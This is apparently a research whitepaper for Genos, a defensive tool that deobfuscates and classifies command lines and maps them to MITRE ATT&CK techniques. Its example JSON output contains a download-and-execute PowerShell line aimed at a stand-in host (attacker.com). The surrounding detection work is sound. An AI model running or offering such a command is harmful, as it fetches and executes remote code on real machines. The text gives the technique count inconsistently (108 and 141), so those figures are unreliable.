Genos v1.2 · IEEE AIIoT 2026 · Research Whitepaper
Security tools collect raw telemetry, but analysts still need to interpret intent. Genos introduces command intelligence: a hybrid system that deobfuscates command-line activity, classifies behavioral intent, and maps malicious actions to MITRE ATT&CK techniques in milliseconds. The system achieves Tier 1 AUC 0.9999 with F1 99.96% on binary threat classification, and 95.53% Top-1 / 97.94% Top-3 accuracy on 108-class MITRE technique attribution — operating at sub-100 ms latency without requiring cloud inference or external API calls. Genos is the research artifact underlying two accepted IEEE AIIoT 2026 papers and is designed as a deployable, analyst-facing intelligence layer for SOC triage, SIEM enrichment, and automated threat attribution.
Command-line activity is one of the richest behavioral signals available to a defender. Every living-off-the-land attack, every credential theft, every lateral movement attempt leaves a trace in process telemetry — yet most security platforms treat command-line data as opaque text, passing it through signature rules or handing it to an analyst with no structured interpretation.
The core difficulty is threefold. First, malicious commands are routinely obfuscated: Base64-encoded payloads, PowerShell character-code constructions, string concatenation, and nested encoding layers are standard adversary practice. A raw string match fails against these techniques by design. Second, even a plaintext command is deeply context-dependent — net user /domain is reconnaissance in one environment and routine IT administration in another. Third, the volume of command-line events in any moderately active environment is large enough that manual triage at scale is not feasible.
Existing approaches — YARA rules, keyword blocklists, traditional SIEM correlation — are brittle, require continuous manual maintenance, and produce high false-positive rates against obfuscated or novel payloads. Large language model-based approaches offer flexibility but introduce latency, cost, and non-determinism that are incompatible with real-time SOC workflows.
Genos is built around the concept of command intelligence: a structured, machine-readable behavioral interpretation of a raw command string. Rather than asking "does this match a known bad signature?", Genos asks three questions in sequence:
This three-question structure produces output that is immediately actionable: an analyst or automated system can triage, escalate, or suppress an alert based on a verdict and a named technique, rather than a raw alert count or a signature ID.
Command intelligence is designed to be a decision layer — sitting between raw telemetry collection (EDR, SIEM, UEBA) and analyst workflow — rather than a replacement for existing detection infrastructure. It enriches existing alerts with behavioral context and ATT&CK-aligned attribution that current tooling does not provide.
Genos processes every command through a sequential four-stage pipeline. Each stage produces structured output that feeds the next.
The two-tier inference design is deliberate. Tier 1 is a neural model: accurate and generalizable, but slower to train and update. Tier 2 is a classical ML pipeline: fast to retrain on new ATT&CK technique data, interpretable via feature weights, and independent of the neural model's internal representations. Keeping them separate means either tier can be improved or retrained without affecting the other.
The entire pipeline is served as a REST API via Gunicorn and Flask, bound to localhost and designed to sit behind a reverse proxy. No external inference calls are made at runtime — all computation is local.
A critical requirement for any command intelligence system is the ability to handle adversarial encoding. In practice, a significant fraction of malicious commands in the wild are obfuscated — specifically to defeat signature-based detection. Genos addresses this with an entropy-aware, iterative deobfuscation pipeline that runs before any classification.
Obfuscation is detected using a combination of Shannon entropy thresholding (commands exceeding 5.2 bits/character are flagged) and pattern matching against six structural indicators: PowerShell character-code constructions, inline Base64 references, string reversal wrappers, concatenation fragments, long obfuscated variable names, and hex byte escapes.
When obfuscation is detected, the engine runs up to five decoding passes in sequence, applying: universal Base64 decoding, embedded FromBase64String() extraction, PowerShell invocation wrapper stripping, character-code resolution ([char]65, range-expansion patterns), and string concatenation collapsing. An optional AST-level simplification step is applied if the pyminusone library is installed. Each pass operates on the output of the previous, and the loop exits early when a pass produces no further entropy reduction (delta < 0.01 bits).
For Tier 2 attribution, the engine uses a structured "Variant A" text representation produced by the parser module, which extracts residual tokens — flags, arguments, paths, executables — separately from the normalized command body. This representation exposes structural features that improve technique attribution beyond raw text matching.
For obfuscated commands, Tier 2 runs twice — once on the original text, once on the decoded payload — and the results are merged by taking the highest confidence score per technique code, capped at five techniques in the final response.
The Gatekeeper is a fine-tuned CodeBERT model trained for three-class classification: Benign, Malicious, and Context-Dependent. CodeBERT was selected over general-purpose language models because it was pre-trained on both natural language and code corpora, giving it a structural understanding of command syntax, flag conventions, and common shell patterns that generic text encoders lack.
The classification head is a two-layer MLP with GELU activation and dropout regularization, operating on the CLS token representation (768 dimensions). Inference runs under mixed-precision autocast — float16 on CUDA, bfloat16 on CPU — making it feasible to run on a single consumer GPU or a standard CPU server without significant latency penalty.
The Gatekeeper's raw neural output is a probability distribution over three classes. This distribution is then passed to a rule-based routing layer before the final verdict is issued, described in Section 6.
The Specialist is a scikit-learn pipeline combining TF-IDF character n-gram features with a Random Forest classifier, trained to attribute commands to one of 108 MITRE ATT&CK techniques. It runs on every request regardless of the Tier 1 verdict — even commands classified as Benign receive a technique attribution, which can surface legitimate administrative commands that map to adversary-relevant behaviors (e.g., net user /domain mapping to T1087 — Account Discovery).
The choice of TF-IDF + Random Forest for Tier 2 is deliberate. Character n-gram features capture subword patterns — flag combinations, executable names, argument structure — that are highly informative for technique attribution and that persist across obfuscation variants. Random Forest provides calibrated per-class probability estimates and can be retrained on new technique data in minutes rather than hours, making it practical to keep the technique map current as the ATT&CK framework evolves.
Tier 2 inference takes approximately 90 ms and runs synchronously with Tier 1, adding negligible end-to-end latency relative to the neural forward pass.
A key architectural decision in Genos is the explicit separation of neural inference and deterministic rule evaluation. The Gatekeeper neural model produces a raw probability distribution, but this distribution is then processed by a rule-based routing layer before the final verdict is issued.
The routing layer operates in four modes:
chmod 777 or crontab -l — are downgraded from Malicious to Suspicious, preventing over-escalation on common administrative operations.This hybrid architecture is intentional. Pure neural approaches achieve high accuracy on in-distribution data but can produce unexpected outputs on novel obfuscation patterns or adversarially crafted inputs. Pure rule systems are brittle and require constant manual maintenance. The combination — neural model providing the base distribution, deterministic rules providing hard constraints and behavioral guardrails — produces a system that is both accurate and operationally auditable.
Every Genos response is a structured JSON object. The schema is consistent across all verdict types, with additional fields populated for obfuscated inputs and context-dependent classifications.
Example — Malicious command (encoded PowerShell reverse shell):
{
"label": "Malicious",
"label_confidence": 99.81,
"deobfuscated_cmd": "invoke-webrequest http://attacker.com/malware.sh | iex",
"MITRE_codes": [
{ "code": "T1059.001", "confidence": 97.43 },
{ "code": "T1071.001", "confidence": 1.22 },
{ "code": "T1105", "confidence": 0.81 },
{ "code": "T1027", "confidence": 0.48 },
{ "code": "T1086", "confidence": 0.06 }
],
"decoded_payload": "Invoke-WebRequest http://attacker.com/malware.sh | IEX"
}
Example — Benign administrative command:
{
"label": "Benign",
"label_confidence": 99.99,
"deobfuscated_cmd": null,
"MITRE_codes": []
}
Example — Context-dependent command requiring analyst review:
{
"label": "Context_Dependent",
"action": "requires_context",
"label_confidence": 71.4,
"MITRE_codes": [
{ "code": "T1087", "confidence": 88.21 }
]
}
| Field | Type | Description |
|---|---|---|
| label | string | Verdict: Benign, Suspicious, Malicious, or Context_Dependent |
| label_confidence | float | Calibrated confidence as a percentage (0–100) |
| MITRE_codes | array | Top-5 technique attributions with per-code confidence; present on all responses |
| deobfuscated_cmd | string|null | Decoded command text; null if no obfuscation was detected |
| decoded_payload | string | Populated for obfuscated inputs with a recoverable payload |
| action | string | Set to "requires_context" for Context_Dependent verdicts |
Genos was evaluated against held-out test splits and a deployment-aligned IEEE benchmark comparing the full neural pipeline against a TF-IDF + Random Forest baseline across multiple traffic compositions and obfuscation scenarios.
The IEEE benchmark evaluated the pipeline at multiple benign-to-malicious traffic ratios to simulate realistic SOC telemetry distributions. Results were stable across ratios, with no significant degradation in precision at high benign traffic volumes — a critical property for operational deployment where false-positive rates directly affect analyst workload.
The stress test (500 concurrent requests, 50% malicious, 20 workers) confirmed consistent throughput at the target latency envelope. Full benchmark artefacts — ROC curves, per-class F1 breakdowns, and latency distributions — are available in the repository's logs/ directory.
Genos was also benchmarked against LLM-based classification approaches for command intent labeling. The neural + rule hybrid pipeline matched or exceeded LLM accuracy on the evaluated corpus while operating at a fraction of the latency and without per-query API cost — a meaningful operational advantage for high-volume telemetry environments.
Genos can be integrated into a SOC workflow as a first-pass triage layer. Rather than routing every command-line alert to an analyst, a Genos verdict of Benign with high confidence can suppress the alert automatically. Malicious verdicts with ATT&CK technique codes are escalated directly to the relevant analyst queue with pre-populated context — reducing the time between detection and investigation from minutes to seconds.
Genos output can be written back to a SIEM as structured fields: verdict, confidence, MITRE technique IDs, and decoded payload. This transforms raw process creation logs into queryable behavioral data. Analysts can write SIEM rules against mitre_code:T1059 rather than maintaining fragile regex patterns against raw command text.
For managed security providers handling telemetry from multiple clients, Genos provides a consistent, vendor-agnostic behavioral labeling layer. Because the pipeline runs locally and requires no external connectivity, it can be deployed in air-gapped or restricted environments where cloud inference is not permitted.
The Context-Dependent verdict class is specifically designed for integration with automated decision workflows. When Genos returns action: requires_context, a downstream orchestration system can query additional telemetry — parent process, user context, network connections — and re-submit the enriched command for a final classification decision without human intervention.
Genos exposes a minimal REST API served by Gunicorn on 127.0.0.1:6001 by default, designed to sit behind a reverse proxy. Two scan endpoints are available.
POST /scan — production endpoint, MongoDB API-key authentication:
curl -X POST https://your-deployment/scan \
-H "Content-Type: application/json" \
-d '{"api_key": "YOUR_KEY", "command": "net user /domain"}'
POST /scan/internal — no-database endpoint for CI, testing, and integration:
curl -X POST http://127.0.0.1:6001/scan/internal \
-H "Content-Type: application/json" \
-d '{"command": "powershell -enc SQBuAHYAbwBrAGUA..."}'
The command field accepts both plain text and Base64-encoded strings. The API attempts a full Base64 decode before passing to the engine, falling back to plain text transparently — which means SIEM and EDR integrations can forward raw process arguments without pre-processing.
Integration with SIEM platforms can be achieved via Logstash or Elastic ingest pipelines calling the scan endpoint and writing the response fields back to the original event document. Python and Bash integration examples are included in the repository.
Genos is designed for single-server deployment with a reverse proxy. The Gunicorn worker is single-process to avoid multiplying GPU memory usage — a second worker would require a second copy of the CodeBERT model in VRAM. On a machine with a dedicated GPU and cached model weights, startup takes under 60 seconds; on CPU-only hardware, startup is longer but inference remains operationally viable at reduced throughput.
The system is production-hardened: model weights are loaded with weights_only=True to prevent arbitrary code execution via malicious checkpoints; the deobfuscation loop is bounded to five passes with an entropy-delta early-exit to prevent deobfuscation bombs; the internal scan endpoint is firewall-protected and optionally token-gated; and no real credentials or secrets are committed to the repository.
Genos is the primary research artifact from two papers accepted to the IEEE World AI IoT Congress (AIIoT 2026), Seattle, USA. Both papers are first-authored by Ahmed Khan.
A Two-Stage Transformer-Based Framework for Command-Line Classification and MITRE ATT&CK Technique Mapping
Presents the cascaded CodeBERT + TF-IDF/RF architecture, deobfuscation pipeline, and evaluation results across 141 technique classes. Reports Tier 1 AUC 0.9999 / F1 99.96% and Tier 2 95.53% Top-1 / 97.94% Top-3 accuracy.
Open-Source Next Gen Endpoint Detection & Response
Presents a kernel-driverless Ring 3 EDR research system using LoRA-fine-tuned RoBERTa for 4-class MITRE ATT&CK behavior detection, achieving 99.5% accuracy across a 1,200-case adversarial stress suite.
Both papers are published through the IEEE AIIoT 2026 programme. PDFs, BibTeX, and supplementary materials will be linked here upon publication.
The current Genos pipeline classifies each command independently. The most significant planned extension is sequence-level reasoning: modeling chains of commands — execution followed by persistence followed by lateral movement — as a temporally ordered adversary behavior graph, enabling detection of multi-stage attacks that are individually ambiguous but collectively unambiguous.
Additional planned directions include: expanded ATT&CK coverage beyond the current 108-technique Specialist map; integration of structured shell AST features as complementary inputs alongside TF-IDF representations; investigation of structure-aware pre-training objectives that better capture the syntactic properties of command-line data; and evaluation on cross-platform telemetry (Linux, macOS) beyond the current Windows-heavy training distribution.
If you use Genos or build on this work, please cite the associated IEEE papers:
@inproceedings{khan2026genos,
title = {A Two-Stage Transformer-Based Framework for Command-Line
Classification and MITRE ATT\&CK Technique Mapping},
author = {Khan, Ahmed},
booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
year = {2026},
address = {Seattle, USA}
}
@inproceedings{khan2026edr,
title = {Open-Source Next Gen Endpoint Detection \& Response},
author = {Khan, Ahmed},
booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
year = {2026},
address = {Seattle, USA}
}
Uses RobertaTokenizer from microsoft/codebert-base. Max length: 256 tokens (override with GENOS_MAX_TOKENS). Padding: max_length. Truncation enabled. Returns PyTorch tensors.
Inference under torch.no_grad() + torch.amp.autocast: float16 on CUDA, bfloat16 on CPU.
| Variable | Default | Purpose |
|---|---|---|
| MONGO_URI | — | MongoDB connection string; enables /scan |
| INTERNAL_TEST_TOKEN | — | Optional token for /scan/internal |
| GENOS_API_BIND | 127.0.0.1:6001 | Gunicorn bind address |
| GENOS_MAX_TOKENS | 256 | Tokeniser max sequence length |
| File | Purpose |
|---|---|
| models/gatekeeper.pt | Tier 1 CodeBERT weights (Git LFS) |
| models/specialist_tfidf_char_rf.pkl | Tier 2 active model (not in git, ~2.4 GB) |
| config/specialist_map.json | 108-class MITRE technique index |
| config/gatekeeper_meta.json | Threshold and training metadata |
GenosEngine is constructed once on process start — no hot-reload. Asset paths are resolved in order: absolute path → relative to os.getcwd() → relative to engine.py directory. A warmup pass runs before traffic is accepted; GET /health returns {"status":"ok"} once complete.
| Setting | Value | Reason |
|---|---|---|
| workers | 1 | One model copy in GPU memory |
| worker_class | sync | CUDA cannot survive post-fork |
| timeout | 300 s | Covers model load on startup |
| preload_app | unset | Prevents fork after CUDA init |